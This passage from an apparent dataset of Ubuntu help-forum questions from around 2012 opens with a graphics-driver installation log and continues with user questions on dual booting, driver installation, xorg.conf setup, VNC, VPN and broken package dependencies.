: fixed mdio bus ' ) 2012-10-03 16:16:07,728 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000029c0sv00001043sd000082b0bc06sc00i00 ' ) 2012-10-03 16:16:07,731 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'usb : v045ep0766d0101dcefdsc02dp01ic01isc01ip00 ' ) 2012-10-03 16:16:07,777 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_usb_audio ' } 2012-10-03 16:16:07,777 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_usb_audio ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,777 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'acpi : pnp0f03 : pnp0f13 : ' ) 2012-10-03 16:16:07,777 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'acpi : pnp0000 : ' ) 2012-10-03 16:16:07,777 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'pci : v00001002d000095c5sv0000174bsd0000e400bc03sc00i00 ' ) 2012-10-03 16:16:08,072 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'fglrx_updates ' , 'package ' : 'fglrx-updates ' } 2012-10-03 16:16:08,133 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/i386-linux-gnu/mesa/ld.so.conf other target alt none other current alt none 2012-10-03 16:16:08,134 debug : fglrx_updates is not the alternative in use 2012-10-03 16:16:08,072 debug : found match in handler pool xorg : fglrx_updates ( [ fglrxdriverupdate , nonfree , disabled ] ati/amd proprietary fglrx graphics driver ( post-release updates ) ) 2012-10-03 16:16:08,136 warning : modinfo for module fglrx_updates failed : error : modinfo : could not find module fglrx_updates 2012-10-03 16:16:08,147 debug : fglrx.available : falling back to default 2012-10-03 16:16:08,173 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/i386-linux-gnu/mesa/ld.so.conf other target alt none other current alt none 2012-10-03 16:16:08,173 debug : fglrx_updates is not the alternative in use 2012-10-03 16:16:08,162 debug : got handler xorg : fglrx_updates ( [ fglrxdriverupdate , nonfree , disabled ] ati/amd proprietary fglrx graphics driver ( post-release updates ) ) 2012-10-03 16:16:08,173 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'fglrx ' , 'package ' : 'fglrx ' } 2012-10-03 16:16:08,184 debug : fglrx.enabled ( fglrx ) : target_alt none current_alt /usr/lib/i386-linux-gnu/mesa/ld.so.conf other target alt none other current alt none 2012-10-03 16:16:08,184 debug : fglrx is not the alternative in use 2012-10-03 16:16:08,173 debug : found match in handler pool xorg : fglrx ( [ fglrxdriver , nonfree , disabled ] ati/amd proprietary fglrx graphics driver ) 2012-10-03 16:16:08,187 warning : modinfo for module fglrx failed : error : modinfo : could not find module fglrx 2012-10-03 16:16:08,190 debug : fglrx.available : falling back to default 2012-10-03 16:16:08,216 debug : fglrx.enabled ( fglrx ) : target_alt none current_alt /usr/lib/i386-linux-gnu/mesa/ld.so.conf other target alt none other current alt none . . . 2012-10-03 16:18:10,552 debug : install progress initramfs-tools 62.500000 2012-10-03 16:18:22,249 debug : install progress libc-bin 62.500000 2012-10-03 16:18:23,251 debug : selecting previously unselected package dkms . ( reading database ... 142496 files and directories currently installed . ) unpacking dkms ( from ... /dkms_2.2.0.3-1ubuntu3_all.deb ) ... selecting previously unselected package fakeroot . unpacking fakeroot ( from ... /fakeroot_1.18.2-1_i386.deb ) ... selecting previously unselected package fglrx-updates . unpacking fglrx-updates ( from ... /fglrx-updates_2 % 3a8.960-0ubuntu1.1_i386.deb ) ... selecting previously unselected package fglrx-amdcccle-updates . unpacking fglrx-amdcccle-updates ( from ... /fglrx-amdcccle-updates_2 % 3a8.960-0ubuntu1.1_i386.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot dpkg : error processing libxss1 ( -- configure ) : package libxss1 is already installed and configured dpkg : error processing chromium-codecs-ffmpeg ( -- configure ) : package chromium-codecs-ffmpeg is already installed and configured dpkg : error processing chromium-browser ( -- configure ) : package chromium-browser is already installed and configured dpkg : error processing chromium-browser-l10n ( -- configure ) : package chromium-browser-l10n is already installed and configured setting up dkms ( 2.2.0.3-1ubuntu3 ) ... no apport report written because maxreports is reached already no apport report written because maxreports is reached already setting up fakeroot ( 1.18.2-1 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode . setting up fglrx-updates ( 2:8.960-0ubuntu1.1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode . update-initramfs : deferring update ( trigger activated ) loading new fglrx-updates-8.960 dkms files ... first installation : checking all kernels ... building only for 3.2.0-29-generic-pae building for architecture i686 building initial module for 3.2.0-29-generic-pae done . fglrx_updates : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-29-generic-pae/updates/dkms/ depmod ... ... dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up fglrx-amdcccle-updates ( 2:8.960-0ubuntu1.1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-29-generic-pae processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : libxss1 chromium-codecs-ffmpeg chromium-browser chromium-browser-l10n error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 2012-10-03 16:18:23,256 error : package failed to install : selecting previously unselected package dkms . ( reading database ... 142496 files and directories currently installed . ) unpacking dkms ( from ... /dkms_2.2.0.3-1ubuntu3_all.deb ) ... selecting previously unselected package fakeroot . unpacking fakeroot ( from ... /fakeroot_1.18.2-1_i386.deb ) ... selecting previously unselected package fglrx-updates . unpacking fglrx-updates ( from ... /fglrx-updates_2 % 3a8.960-0ubuntu1.1_i386.deb ) ... selecting previously unselected package fglrx-amdcccle-updates . unpacking fglrx-amdcccle-updates ( from ... /fglrx-amdcccle-updates_2 % 3a8.960-0ubuntu1.1_i386.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot dpkg : error processing libxss1 ( -- configure ) : package libxss1 is already installed and configured dpkg : error processing chromium-codecs-ffmpeg ( -- configure ) : package chromium-codecs-ffmpeg is already installed and configured dpkg : error processing chromium-browser ( -- configure ) : package chromium-browser is already installed and configured dpkg : error processing chromium-browser-l10n ( -- configure ) : package chromium-browser-l10n is already installed and configured setting up dkms ( 2.2.0.3-1ubuntu3 ) ... no apport report written because maxreports is reached already no apport report written because maxreports is reached already setting up fakeroot ( 1.18.2-1 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode . setting up fglrx-updates ( 2:8.960-0ubuntu1.1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode . update-initramfs : deferring update ( trigger activated ) loading new fglrx-updates-8.960 dkms files ... first installation : checking all kernels ... building only for 3.2.0-29-generic-pae building for architecture i686 building initial module for 3.2.0-29-generic-pae done . fglrx_updates : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-29-generic-pae/updates/dkms/ depmod ... ... dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up fglrx-amdcccle-updates ( 2:8.960-0ubuntu1.1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-29-generic-pae processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : libxss1 chromium-codecs-ffmpeg chromium-browser chromium-browser-l10n error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 2012-10-03 16:18:23,590 warning : /sys/module/fglrx_updates/drivers does not exist , can not rebind fglrx_updates driver 2012-10-03 16:18:43,601 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:43,601 debug : fglrx_updates is not the alternative in use 2012-10-03 16:18:43,617 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:43,617 debug : fglrx_updates is not the alternative in use 2012-10-03 16:18:54,143 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:54,144 debug : fglrx_updates is not the alternative in use 2012-10-03 16:18:54,154 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:54,154 debug : fglrx_updates is not the alternative in use 2012-10-03 16:18:54,182 debug : fglrx.enabled ( fglrx ) : target_alt /usr/lib/fglrx/ld.so.conf current_alt /usr/lib/fglrx/ld.so.conf other target alt /usr/lib/fglrx/alt_ld.so.conf other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:54,182 debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking 2012-10-03 16:18:54,215 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:54,215 debug : fglrx_updates is not the alternative in use 2012-10-03 16:18:54,229 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:54,229 debug : fglrx_updates is not the alternative in use 2012-10-03 16:18:54,268 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:54,268 debug : fglrx_updates is not the alternative in use 2012-10-03 16:18:54,279 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:54,279 debug : fglrx_updates is not the alternative in use 2012-10-03 16:18:54,298 debug : fglrx.enabled ( fglrx ) : target_alt /usr/lib/fglrx/ld.so.conf current_alt /usr/lib/fglrx/ld.so.conf other target alt /usr/lib/fglrx/alt_ld.so.conf other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 16:18:54,298 debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking 2012-10-03 16:18:57,828 debug : shutting down i do n't know how to troubleshoot from looking at the log file , could somebody assist me with this please ? you can download the log file at : https : //www.dropbox.com/s/a59d2hyabo02q5z/jockey.log
197920	windows dual boot installation question	ok , i have windows 7 installed , i do n't know weather or not it is in a partition in my c drive , but i have 450gb free space . when i install ubuntu does it use all of the free space as a partition for ubuntu , or does it just use what ever amount in needs . i just want it to partition itself , like so it would know how much to give itself instead of it just taking all the space for itself . my windows installation takes up 51gb of space .
197921	i can not install ubuntu on my laptop running windows 8	i installed ubuntu 12.04 ( ubuntu-12.04.1-desktop-amd64.iso ) to my 4gb usb sandisk drive so that i could install it on my laptop . i was able to get to the setup but when i would get to the part where it would ask me if i want to replace windows or install next to it i chose to install next to it and then it would restart the computer . i wanted to try using wubi.exe to install it from windows but i 'm afraid to do that since all it says for destination is c : which is the place i use for windows 8 . i can run ubuntu off the usb stick but i 'd like to install it next to windows 8 so that i can dual-boot between the two .
197926	installing ubuntu 12.10 correctly on dell inspiron 6000 with 2 gb ram	i installed ubuntu 12.10 after creating a disk from the iso file . apparently everything installed correctly but after first reboot , system doesnt run . any suggestions what i am doing wrong ?
197927	where is the list with the wallpapers ( shown in the appearance window ) stored ?	when trying to add wallpapers from previous ubuntu versions & those i found on the internet ( following these instructions ) , i somehow messed up the list of wallpapers included in the appearance window : most wallpapers are doubled , and only one of the wallpapers i added in the /usr/share/backgrounds folder got permanently added to the list shown . now , what i wonder : where is the list stored of pictures shown in the appearance window ? or is there no such list ? in the latter case : what factors determine which pictures in the backgrounds folder are displayed ( and which are n't ) ?
197937	`` what 's new '' is missing in software centre	i 've just reinstalled ubuntu 12.04.01 and noticed that the what 's new section in the software centre is missing . has this happened to anyone else ? how will i discover new apps now ?
197939	displaylink usb show `` logo / loading '' on monitor	i tried with this problem for 2 years already . lol , today , i install ubuntu for i have to resolve it or i will back to stupid windows 7 . first , i have 3 monitors . my graphic card is support dual ( ati radeon ) , so i have no problem on extend those multi monitor on vga and dvi . the 3rd monitor is displaylink usb . after installed everything required , when i reboot , the displaylink monitor show `` ubuntu ... . '' like logo / loading screen . i go to system > display , detect monitor , it only show my 1st and 2nd , no 3rd displaylink . i can move my mouse between those 1st & 2nd , but the 3rd is only show the ubuntu screen . i press ctrl+alt+1 , then screen switch to displaylink usb 3rd monitor , but its `` terminal '' not a desktop . then i press ctrl+alt+7 , the screen switch back to my 1st , 2nd , and the displaylink 3rd is witch back to logo / ubuntu again . this is my /etc/x11/xorg.conf : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 screen 1 `` displaylinkscreen '' leftof `` aticonfig-screen [ 0 ] -0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' load `` dri2 '' load `` dbe '' load `` dri '' load `` record '' load `` extmod '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection section `` monitor '' identifier `` 0-dfp1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1680x1050 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-crt2 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 1680 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` swcursor '' # [ < bool > ] # option `` dac6bit '' # [ < bool > ] # option `` dac8bit '' # [ < bool > ] # option `` bustype '' # [ < str > ] # option `` cppiomode '' # [ < bool > ] # option `` cpusectimeout '' # < i > # option `` agpmode '' # < i > # option `` agpfastwrite '' # [ < bool > ] # option `` agpsize '' # < i > # option `` gartsize '' # < i > # option `` ringsize '' # < i > # option `` buffersize '' # < i > # option `` enabledepthmoves '' # [ < bool > ] # option `` enablepageflip '' # [ < bool > ] # option `` nobackbuffer '' # [ < bool > ] # option `` dmaforxv '' # [ < bool > ] # option `` fbtexpercent '' # < i > # option `` depthbits '' # < i > # option `` pciapersize '' # < i > # option `` acceldfs '' # [ < bool > ] # option `` ignoreedid '' # [ < bool > ] # option `` customedid '' # [ < str > ] # option `` displaypriority '' # [ < str > ] # option `` panelsize '' # [ < str > ] # option `` forcemindotclock '' # < freq > # option `` colortiling '' # [ < bool > ] # option `` videokey '' # < i > # option `` ragetheatrecrystal '' # < i > # option `` ragetheatretunerport '' # < i > # option `` ragetheatrecompositeport '' # < i > # option `` ragetheatresvideoport '' # < i > # option `` tunertype '' # < i > # option `` ragetheatremicrocpath '' # < str > # option `` ragetheatremicroctype '' # < str > # option `` scalerwidth '' # < i > # option `` renderaccel '' # [ < bool > ] # option `` subpixelorder '' # [ < str > ] # option `` clockgating '' # [ < bool > ] # option `` vgaaccess '' # [ < bool > ] # option `` reverseddc '' # [ < bool > ] # option `` lvdsprobepll '' # [ < bool > ] # option `` accelmethod '' # < str > # option `` dri '' # [ < bool > ] # option `` connectortable '' # < str > # option `` defaultconnectortable '' # [ < bool > ] # option `` defaulttmdspll '' # [ < bool > ] # option `` tvdacloaddetect '' # [ < bool > ] # option `` forcetvout '' # [ < bool > ] # option `` tvstandard '' # < str > # option `` ignorelidstatus '' # [ < bool > ] # option `` defaulttvdacadj '' # [ < bool > ] # option `` int10 '' # [ < bool > ] # option `` exavsync '' # [ < bool > ] # option `` atomtvout '' # [ < bool > ] # option `` r4xxatom '' # [ < bool > ] # option `` forcelowpowermode '' # [ < bool > ] # option `` dynamicpm '' # [ < bool > ] # option `` newpll '' # [ < bool > ] # option `` zaphodheads '' # < str > identifier `` card0 '' driver `` radeon '' busid `` pci:5:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card1 '' driver `` fbdev '' busid `` pci:5:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card2 '' driver `` vesa '' busid `` pci:5:0:0 '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-dfp1 '' `` 0-dfp1 '' option `` monitor-crt2 '' `` 0-crt2 '' busid `` pci:5:0:0 '' endsection section `` device '' identifier `` displaylinkdevice '' driver `` displaylink '' option `` fbdev '' `` /dev/fb1 '' option `` shadowfb '' `` off '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 3600 1920 depth 24 endsubsection endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1920x1080 '' endsubsection endsection
197941	is it possible to install unity 6.x.x on 12.04 ?	is it possible to get the latest unity without upgrading to 12.10 on my ubuntu 12.04 pc or will this be backported ?
197942	how do i change the ip adress given for the shared connection ?	i currently have my desktop pc dual booting windows 7 and ubuntu . the pc has a wireless card installed . i run a lan cable from the pc to my xbox 360 . in windows 7 , i can bridge the wireless and wired connections so that my xbox gets an internet connection and its own ip address . from my router , i can then open ports to my xbox that it needs . when i boot into ubuntu , however , i run into issues . i have the wired connection set to `` shared to other computers '' under ipv4 settings as it should be . the xbox then has internet connection . instead of having a 192.x.x.x ip address which i could open ports to , however , it is given a 10.x.x.x address . my router wo n't allow me to open ports to this address since it 's on a separate subnet . here 's the question : how can i change the connection share so that it keeps my xbox on the same subnet ?
197946	how to save machine state without hibernating ?	i wonder is it possible to capture the state of the machine without actually hibernating ? the goal would be to make a `` backup state '' , so if the system crashes , one could boot directly to a session with all the windows opened , all the tabs in the browser restored etc . i think it might not be doable -- saving a snapshot of the memory , then changing the data on the hard drive , and then again restoring the snapshot would result in broken file descriptors etc . for example , a process opened a file before the snapshot was taken , and when the snapshot was restored , the file is no longer existing . but maybe there is an ingenious way of solving that ?
197950	can i share the two lists of downloads with transmission and transmission-daemon ?	i just discovered transmission-daemon so i installed it to use rpc calls . i successfully added a torrent , but when i launched transmission in unity , there was no trace of the download . i discovered later that i was in the web interface . so one simple question : can i share the two lists of downloads ( transmission gtk and transmission-daemon ) in both interfaces ?
197951	facebook and hotmail site do n't work	in facebook website , when i enter my username and password and `` log in '' , it does n't allow me to get through . in hotmail , the page does n't open up at all . in other sites , i do n't have any problem at the moment . i hope you can help me ! my internet connection is by router ( cable )
197952	ca n't install ubuntu one	while trying to install ubuntu one it throws me this error - w : failed to fetch http : //ppa.launchpad.net/rabbitvcs/ppa/ubuntu/dists/**distribution**/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/rabbitvcs/ppa/ubuntu/dists/**distribution**/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . and i ca n't install it thanks .
197954	installing ubuntu linux on a ps2	i want to install ubuntu linux on a ps2 ( model scph-50004 ) . i have searched a lot on google and other search engines , but only found this video on youtube , and it 's not quite what i wanted . i am quite new to linux so i need help with this . is it possible to install ubuntu on a ps2 ? how ?
197956	vnc server on ubuntu 12.04 is not working -- external vnc clients can not access	i did : sudo apt-get install vnc4server then : vncserver but vnc viewer at a windows computer could not access the ubuntu . then , i did : sudo apt-get install gnome-core but still no access .
197958	can not connect to wifi after downloading 12.04 , repeated prompts for password	i have had this os for a little bit but this is my first upgrade and my first issue i am trying to deal with without my buddy who got my on ubuntu in the first place ( who is on the other side of the country . ) i am running an ibm lenovo t400 thinkpad that had 11.10 on it and worked flawless . i upgraded to 12.04 a few weeks back and i have not been able to connect to the wifi in my home or anywhere for that matter . i have been trying to mess with it through reading the forums and am not quite sure what my problem is . i am running off of fios internet and the wifi keep disconnecting and prompts me to retype the password for reconnecting . if you guys could give me a step by step process of how i should go about fixing this i would greatly appreciate it !
197960	compatibility ubuntu with gigabyte ga-z77x-ud5h-wb wifi	i want to buy a gigabyte ga-z77x-ud5h-wb wifi motherboard . can i install ubuntu or another linux os on a computer with this motherboard ? if this is possible : where i can download the drivers for this motherboard or are they already in the ubuntu installation package ? thank you .
197965	openjdk default options to always use the server vm	i got a warning message : jvm uses the client vm , make sure to run java with the server vm for best performance by adding -server to the command line in fact , when i run java -version i get : openjdk runtime environment ( icedtea7 2.3.2 ) ( 7u7-2.3.2a-0ubuntu0.12.04.1 ) openjdk client vm ( build 23.2-b09 , mixed mode , sharing ) how does one go about and change openjdk 's defaults to always start under the server vm ?
197967	hp desktjet 1000 j110 network needs authentication	i have a desktopjet 1000 j110 printer that is detected and shared among the network i have setup..the problem i 'm running into is it wants authentication to print..i never setup a password , or a username . i have samba installed allowing `` anyone '' to use the printer..but it 's the same results ... this is so annoying .
197968	in rhythmbox , is there a way to sort by artist and search by title ?	in rhythmbox i sort my music by artist . when i quickly want to look for a song i 'd like to type in the title of the song . not in the standard search box up top , but by starting to type when i 've clicked anywhere in the list of songs . a small search box appears in the right bottom corner just like it does in nautilus . the thing is , when i sort by artist that search looks up the artist as well . when i sort by title , it searches by title . i 'd like to sort by artist and search by title , but not using the standard search feature . is there a way to do that ?
197978	how can i uninstall a graphics package in recover mode ?	so i 've been having some graphics problems , and recently i installed these packages : http : //www.ubuntugeek.com/how-to-install-intel-82852855gm-drivers-in-ubuntu-using-ppa.html but after installing those and restarting my computer , i can not get ubuntu to load -- it freezes on the purple screen . in recovery mode , i have tried to use root to fix some things , but it has n't work , and i can not connect to the internet in recovery mode to download anything else . is there any way i can uninstall these packages in recovery mode to revert back to what i had before ?
197981	what is the latest ubuntu version that i can use with my powermac g5 ( non-intel ? )	i recently received a old powermac g5 . i updated its mac os operating system to 10.5.8 . i dabbled with ubuntu with my macbook and i really liked the experience . i 'm trying to find the best version of ubuntu to install on my powermac . i 'm also , looking for more precise instructions . most of the info that i have found is only relevant to intel-based apple computers . thanks !
197990	how do i install bumblebee ?	i have just installed ubuntu 12.04 lts and noticed that the battery life drastically lower than it was in windows due to the fact that optimus was disabled . after some search i have found the bumblebee project , but i was not able to install it . the problem is as follows the command sudo apt-get install bumblebee bumblebee-nvidia does not work and the output is as follows : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package bumblebee e : unable to locate package bumblebee-nvidia i have tried many things , but since i am a new user i might be missing a key point . previous commands : sudo add-apt-repository ppa : bumblebee/stable sudo add-apt-repository ppa : ubuntu-x-swat/x-updates seem to work without any problems , but `` sudo apt-get update '' gives the following output , w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i am really confused about the situation and unable to take any action , help is greatly appreciated . thanks
197997	convert flv video to 3gp	i use winff ( the gui for ffmpeg ) to convert audio/video to different formats . yesterday i was trying to convert an flv video to 3gp ( so that i could see it on my mobile phone ) , but it does n't show the option to convert to 3gp . are codecs missing in ffmpeg ? do i need to download such codecs from the repositories ? please , help .
197999	vpn connection failed because service stopped unexpectedly	after a ) sudo apt-get install network-manager-vpnc b ) import my .pcf file c ) try to connect the vpn get the error : the vpn connection 'prueba ' failed because the vpn service stopped unexpectedly can u help me ? thanks
198000	how can i convert an ext4 partition to btrfs ( or other file systems ) without losing data ?	i wish to convert my current /home partition to btrfs ( or other file systems ) without losing data if possible , what steps should i take for this ? is it safe ?
198001	i still ca n't update 12.04 lts due to broken packages , unmet dependancies ... .please see what i 've tried	here 's what i 'm doing to try & fix the brokern packages and here 's the error messages that i 'm receiving . what else can i do or run to get this 12.04 lts to update and to also be able to use the software manager as well as synaptic ? ten because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : ubuntu-sso-client-qt ubuntu-sso-client-gtk software-center e : sub-process /usr/bin/dpkg returned an error code ( 1 ) rich @ rich-latitude-d620 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : ubuntu-sso-client-gtk : depends : python-ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) but 3.0.2-0ubuntu3 is installed depends : ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) but 3.0.2-0ubuntu3 is installed ubuntu-sso-client-qt : depends : python-ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) but 3.0.2-0ubuntu3 is installed depends : ubuntu-sso-client ( = 3.0.2-0ubuntu1 ) but 3.0.2-0ubuntu3 is installed e : unmet dependencies . try using -f. rich @ rich-latitude-d620 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : ubuntu-sso-client-gtk ubuntu-sso-client-qt the following packages will be upgraded : ubuntu-sso-client-gtk ubuntu-sso-client-qt 2 upgraded , 0 newly installed , 0 to remove and 38 not upgraded . 3 not fully installed or removed . need to get 0 b/569 kb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of ubuntu-sso-client-gtk : ubuntu-sso-client-gtk depends on python-ubuntu-sso-client ( = 